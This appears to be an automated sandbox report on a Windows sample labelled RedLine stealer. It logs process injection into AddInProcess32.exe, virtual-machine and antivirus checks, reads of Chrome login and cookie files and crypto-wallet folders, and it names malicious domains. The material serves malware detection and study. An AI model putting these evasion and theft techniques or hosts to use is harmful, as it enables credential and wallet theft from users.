Source: YZ1q5HY7kK.exe	ReversingLabs: Detection: 68%

Source: unknown	Process created: C:\Users\user\Desktop\YZ1q5HY7kK.exe 'C:\Users\user\Desktop\YZ1q5HY7kK.exe'
Source: C:\Users\user\Desktop\YZ1q5HY7kK.exe	Process created: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exe C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exe
Source: C:\Users\user\Desktop\YZ1q5HY7kK.exe	Process created: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exe C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exe

Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exe

Key value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Classes\WOW6432Node\CLSID\{CF4CC405-E2C5-4DDD-B3CE-5E7582D8C9FA}\InprocServer32

Source: YZ1q5HY7kK.exe

Static PE information: data directory type: IMAGE_DIRECTORY_ENTRY_COM_DESCRIPTOR

Source: YZ1q5HY7kK.exe

Static PE information: NO_SEH, TERMINAL_SERVER_AWARE, DYNAMIC_BASE, NX_COMPAT

Source: YZ1q5HY7kK.exe

Static PE information: data directory type: IMAGE_DIRECTORY_ENTRY_DEBUG

Source: YZ1q5HY7kK.exe

Static PE information: 0xDBB3B79A [Sun Oct 20 21:37:30 2086 UTC]

Source: C:\Users\user\Desktop\YZ1q5HY7kK.exe	Code function: 0_2_0546C7A2 push esp; retf
Source: C:\Users\user\Desktop\YZ1q5HY7kK.exe	Code function: 0_2_0546CA51 push 8B67B81Ch; ret
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exe	Code function: 4_2_02E70470 push FFFFFFC3h; ret

Source: C:\Users\user\Desktop\YZ1q5HY7kK.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\Desktop\YZ1q5HY7kK.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\Desktop\YZ1q5HY7kK.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\Desktop\YZ1q5HY7kK.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\Desktop\YZ1q5HY7kK.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\Desktop\YZ1q5HY7kK.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\Desktop\YZ1q5HY7kK.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\Desktop\YZ1q5HY7kK.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\Desktop\YZ1q5HY7kK.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\Desktop\YZ1q5HY7kK.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\Desktop\YZ1q5HY7kK.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\Desktop\YZ1q5HY7kK.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\Desktop\YZ1q5HY7kK.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\Desktop\YZ1q5HY7kK.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\Desktop\YZ1q5HY7kK.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\Desktop\YZ1q5HY7kK.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\Desktop\YZ1q5HY7kK.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\Desktop\YZ1q5HY7kK.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\Desktop\YZ1q5HY7kK.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\Desktop\YZ1q5HY7kK.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\Desktop\YZ1q5HY7kK.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\Desktop\YZ1q5HY7kK.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\Desktop\YZ1q5HY7kK.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\Desktop\YZ1q5HY7kK.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\Desktop\YZ1q5HY7kK.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\Desktop\YZ1q5HY7kK.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\Desktop\YZ1q5HY7kK.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\Desktop\YZ1q5HY7kK.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\Desktop\YZ1q5HY7kK.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\Desktop\YZ1q5HY7kK.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\Desktop\YZ1q5HY7kK.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\Desktop\YZ1q5HY7kK.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\Desktop\YZ1q5HY7kK.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\Desktop\YZ1q5HY7kK.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\Desktop\YZ1q5HY7kK.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\Desktop\YZ1q5HY7kK.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\Desktop\YZ1q5HY7kK.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\Desktop\YZ1q5HY7kK.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\Desktop\YZ1q5HY7kK.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exe	Process information set: NOOPENFILEERRORBOX

Malware Analysis System Evasion:

Queries sensitive disk information (via WMI, Win32_DiskDrive, often done to detect virtual machines)

Show sources

Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exe

WMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_DiskDrive

Queries sensitive video device information (via WMI, Win32_VideoController, often done to detect virtual machines)

Show sources

Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exe

WMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_VideoController

Source: C:\Users\user\Desktop\YZ1q5HY7kK.exe	Thread delayed: delay time: 922337203685477
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exe	Thread delayed: delay time: 922337203685477
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exe	Thread delayed: delay time: 922337203685477

Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exe	Window / User API: threadDelayed 1381
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exe	Window / User API: threadDelayed 6249

Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exe

Registry key enumerated: More than 150 enums for key HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Uninstall

Source: C:\Users\user\Desktop\YZ1q5HY7kK.exe TID: 6904	Thread sleep time: -922337203685477s >= -30000s
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exe TID: 4780	Thread sleep time: -11990383647911201s >= -30000s
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exe TID: 1320	Thread sleep time: -30000s >= -30000s
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exe TID: 7140	Thread sleep time: -922337203685477s >= -30000s

Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exe

WMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_Processor

Source: C:\Users\user\Desktop\YZ1q5HY7kK.exe	Thread delayed: delay time: 922337203685477
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exe	Thread delayed: delay time: 922337203685477
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exe	Thread delayed: delay time: 922337203685477

Source: YZ1q5HY7kK.exe, 00000000.00000002.656615061.0000000005500000.00000002.00000001.sdmp	Binary or memory string: A Virtual Machine could not be started because Hyper-V is not installed.
Source: YZ1q5HY7kK.exe, 00000000.00000002.656615061.0000000005500000.00000002.00000001.sdmp	Binary or memory string: A communication protocol error has occurred between the Hyper-V Host and Guest Compute Service.
Source: YZ1q5HY7kK.exe, 00000000.00000002.656615061.0000000005500000.00000002.00000001.sdmp	Binary or memory string: The communication protocol version between the Hyper-V Host and Guest Compute Services is not supported.
Source: AddInProcess32.exe, 00000004.00000002.705196441.000000000135B000.00000004.00000020.sdmp	Binary or memory string: Hyper-V RAW%SystemRoot%\system32\mswsock.dll
Source: YZ1q5HY7kK.exe, 00000000.00000002.656615061.0000000005500000.00000002.00000001.sdmp	Binary or memory string: An unknown internal message was received by the Hyper-V Compute Service.

Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exe

Process information queried: ProcessInformation

Source: C:\Users\user\Desktop\YZ1q5HY7kK.exe

Code function: 0_2_02E70448 LdrInitializeThunk,

Source: C:\Users\user\Desktop\YZ1q5HY7kK.exe	Process token adjusted: Debug
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exe	Process token adjusted: Debug

Source: C:\Users\user\Desktop\YZ1q5HY7kK.exe

Memory allocated: page read and write | page guard

HIPS / PFW / Operating System Protection Evasion:

Allocates memory in foreign processes

Show sources

Source: C:\Users\user\Desktop\YZ1q5HY7kK.exe

Memory allocated: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exe base: 400000 protect: page execute and read and write

Injects a PE file into a foreign processes

Show sources

Source: C:\Users\user\Desktop\YZ1q5HY7kK.exe

Memory written: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exe base: 400000 value starts with: 4D5A

Writes to foreign memory regions

Show sources

Source: C:\Users\user\Desktop\YZ1q5HY7kK.exe	Memory written: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exe base: 400000
Source: C:\Users\user\Desktop\YZ1q5HY7kK.exe	Memory written: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exe base: 402000
Source: C:\Users\user\Desktop\YZ1q5HY7kK.exe	Memory written: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exe base: 418000
Source: C:\Users\user\Desktop\YZ1q5HY7kK.exe	Memory written: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exe base: 41A000
Source: C:\Users\user\Desktop\YZ1q5HY7kK.exe	Memory written: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exe base: E3E008

Source: C:\Users\user\Desktop\YZ1q5HY7kK.exe

Process created: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exe C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exe

Source: C:\Users\user\Desktop\YZ1q5HY7kK.exe	Queries volume information: C:\Users\user\Desktop\YZ1q5HY7kK.exe VolumeInformation
Source: C:\Users\user\Desktop\YZ1q5HY7kK.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\Microsoft.CSharp\v4.0_4.0.0.0__b03f5f7f11d50a3a\Microsoft.CSharp.dll VolumeInformation
Source: C:\Users\user\Desktop\YZ1q5HY7kK.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Dynamic\v4.0_4.0.0.0__b03f5f7f11d50a3a\System.Dynamic.dll VolumeInformation
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exe	Queries volume information: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exe VolumeInformation
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.ServiceModel\v4.0_4.0.0.0__b77a5c561934e089\System.ServiceModel.dll VolumeInformation
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\SMDiagnostics\v4.0_4.0.0.0__b77a5c561934e089\SMDiagnostics.dll VolumeInformation
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.ServiceModel.Internals\v4.0_4.0.0.0__31bf3856ad364e35\System.ServiceModel.Internals.dll VolumeInformation
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\System.Transactions\v4.0_4.0.0.0__b77a5c561934e089\System.Transactions.dll VolumeInformation
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\System.Transactions\v4.0_4.0.0.0__b77a5c561934e089\System.Transactions.dll VolumeInformation
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\System.Transactions\v4.0_4.0.0.0__b77a5c561934e089\System.Transactions.dll VolumeInformation
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.IdentityModel\v4.0_4.0.0.0__b77a5c561934e089\System.IdentityModel.dll VolumeInformation
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Drawing\v4.0_4.0.0.0__b03f5f7f11d50a3a\System.Drawing.dll VolumeInformation
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Windows.Forms\v4.0_4.0.0.0__b77a5c561934e089\System.Windows.Forms.dll VolumeInformation
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Web.Extensions\v4.0_4.0.0.0__31bf3856ad364e35\System.Web.Extensions.dll VolumeInformation
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\System.Web\v4.0_4.0.0.0__b03f5f7f11d50a3a\System.Web.dll VolumeInformation
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Management\v4.0_4.0.0.0__b03f5f7f11d50a3a\System.Management.dll VolumeInformation
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Security\v4.0_4.0.0.0__b03f5f7f11d50a3a\System.Security.dll VolumeInformation

Source: C:\Users\user\Desktop\YZ1q5HY7kK.exe

Key value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Cryptography MachineGuid

Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exe	WMI Queries: IWbemServices::ExecQuery - ROOT\SecurityCenter2 : SELECT * FROM AntivirusProduct
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exe	WMI Queries: IWbemServices::ExecQuery - ROOT\SecurityCenter : SELECT * FROM AntivirusProduct
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exe	WMI Queries: IWbemServices::ExecQuery - ROOT\SecurityCenter2 : SELECT * FROM FirewallProduct
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exe	WMI Queries: IWbemServices::ExecQuery - ROOT\SecurityCenter : SELECT * FROM FirewallProduct

Stealing of Sensitive Information:

Found many strings related to Crypto-Wallets (likely being stolen)

Show sources

Source: YZ1q5HY7kK.exe, 00000000.00000002.653240729.0000000003FE9000.00000004.00000001.sdmp	String found in binary or memory: ElectrumRule
Source: AddInProcess32.exe, 00000004.00000002.706253891.000000000312E000.00000004.00000001.sdmp	String found in binary or memory: k1C:\Users\user\AppData\Roaming\Electrum\wallets\*
Source: YZ1q5HY7kK.exe, 00000000.00000002.653240729.0000000003FE9000.00000004.00000001.sdmp	String found in binary or memory: JaxxRule
Source: YZ1q5HY7kK.exe, 00000000.00000002.653240729.0000000003FE9000.00000004.00000001.sdmp	String found in binary or memory: Exodus+\Exodus\exodus.wallet
Source: YZ1q5HY7kK.exe, 00000000.00000002.653240729.0000000003FE9000.00000004.00000001.sdmp	String found in binary or memory: Ethereum#\Ethereum\wallets
Source: YZ1q5HY7kK.exe, 00000000.00000002.653240729.0000000003FE9000.00000004.00000001.sdmp	String found in binary or memory: ExodusRule
Source: YZ1q5HY7kK.exe, 00000000.00000002.653240729.0000000003FE9000.00000004.00000001.sdmp	String found in binary or memory: EthereumRule
Source: AddInProcess32.exe, 00000004.00000002.706253891.000000000312E000.00000004.00000001.sdmp	String found in binary or memory: k5C:\Users\user\AppData\Roaming\Exodus\exodus.wallet\*

Tries to harvest and steal browser information (history, passwords, etc)

Show sources

Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Cookies
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Login Data
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Web Data

Tries to steal Crypto Currency Wallets

Show sources

Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exe	File opened: C:\Users\user\AppData\Roaming\Ethereum\wallets\
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exe	File opened: C:\Users\user\AppData\Roaming\Exodus\exodus.wallet\

Source: Yara match

File source: Process Memory Space: AddInProcess32.exe PID: 7088, type: MEMORY

Mitre Att&ck Matrix

Initial Access	Execution	Persistence	Privilege Escalation	Defense Evasion	Credential Access	Discovery	Lateral Movement	Collection	Exfiltration	Command and Control	Network Effects	Remote Service Effects	Impact
Valid Accounts	Windows Management Instrumentation221	Path Interception	Process Injection311	Masquerading1	OS Credential Dumping1	Security Software Discovery221	Remote Services	Archive Collected Data1	Exfiltration Over Other Network Medium	Encrypted Channel12	Eavesdrop on Insecure Network Communication	Remotely Track Device Without Authorization	Modify System Partition
Default Accounts	Scheduled Task/Job	Boot or Logon Initialization Scripts	Boot or Logon Initialization Scripts	Disable or Modify Tools1	LSASS Memory	Process Discovery11	Remote Desktop Protocol	Data from Local System3	Exfiltration Over Bluetooth	Non-Application Layer Protocol2	Exploit SS7 to Redirect Phone Calls/SMS	Remotely Wipe Data Without Authorization	Device Lockout
Domain Accounts	At (Linux)	Logon Script (Windows)	Logon Script (Windows)	Virtualization/Sandbox Evasion231	Security Account Manager	Virtualization/Sandbox Evasion231	SMB/Windows Admin Shares	Data from Network Shared Drive	Automated Exfiltration	Application Layer Protocol3	Exploit SS7 to Track Device Location	Obtain Device Cloud Backups	Delete Device Data
Local Accounts	At (Windows)	Logon Script (Mac)	Logon Script (Mac)	Process Injection311	NTDS	Application Window Discovery1	Distributed Component Object Model	Input Capture	Scheduled Transfer	Protocol Impersonation	SIM Card Swap		Carrier Billing Fraud
Cloud Accounts	Cron	Network Logon Script	Network Logon Script	Obfuscated Files or Information2	LSA Secrets	Remote System Discovery1	SSH	Keylogging	Data Transfer Size Limits	Fallback Channels	Manipulate Device Communication		Manipulate App Store Rankings or Ratings
Replication Through Removable Media	Launchd	Rc.common	Rc.common	Timestomp1	Cached Domain Credentials	System Information Discovery123	VNC	GUI Input Capture	Exfiltration Over C2 Channel	Multiband Communication	Jamming or Denial of Service		Abuse Accessibility Features

Behavior Graph

Hide Legend

Legend:

Process
Signature
Created File
DNS/IP Info
Is Dropped
Is Windows Process
Number of created Registry Values
Number of created Files
Visual Basic
Delphi
Java
.Net C# or VB.NET
C, C++ or other language
Is malicious
Internet

Screenshots

Thumbnails

This section contains all screenshots as thumbnails, including those not shown in the slideshow.

Antivirus, Machine Learning and Genetic Malware Detection

Initial Sample

Source	Detection	Scanner	Label	Link
YZ1q5HY7kK.exe	48%	Virustotal		Browse
YZ1q5HY7kK.exe	41%	Metadefender		Browse
YZ1q5HY7kK.exe	69%	ReversingLabs	ByteCode-MSIL.Trojan.RedLine

Dropped Files

No Antivirus matches

Unpacked PE Files

No Antivirus matches

Domains

Source	Detection	Scanner	Link
ry.beablog.ru	0%	Virustotal	Browse
ynnnzonie.xyz	1%	Virustotal	Browse
api.ip.sb	0%	Virustotal	Browse

URLs

Source	Detection	Scanner	Label
http://service.r	0%	URL Reputation	safe
http://service.r	0%	URL Reputation	safe
http://service.r	0%	URL Reputation	safe
http://service.r	0%	URL Reputation	safe
https://ry.beablog.ru	100%	Avira URL Cloud	PUA
http://schemas.datacontract.org	0%	URL Reputation	safe
http://schemas.datacontract.org	0%	URL Reputation	safe
http://schemas.datacontract.org	0%	URL Reputation	safe
http://tempuri.org/Endpoint/GetArguments	0%	Avira URL Cloud	safe
http://ynnnzonie.xyz/	100%	Avira URL Cloud	malware
https://api.ip.sb/geoip	0%	URL Reputation	safe
https://api.ip.sb/geoip	0%	URL Reputation	safe
https://api.ip.sb/geoip	0%	URL Reputation	safe
http://tempuri.org/	0%	Avira URL Cloud	safe
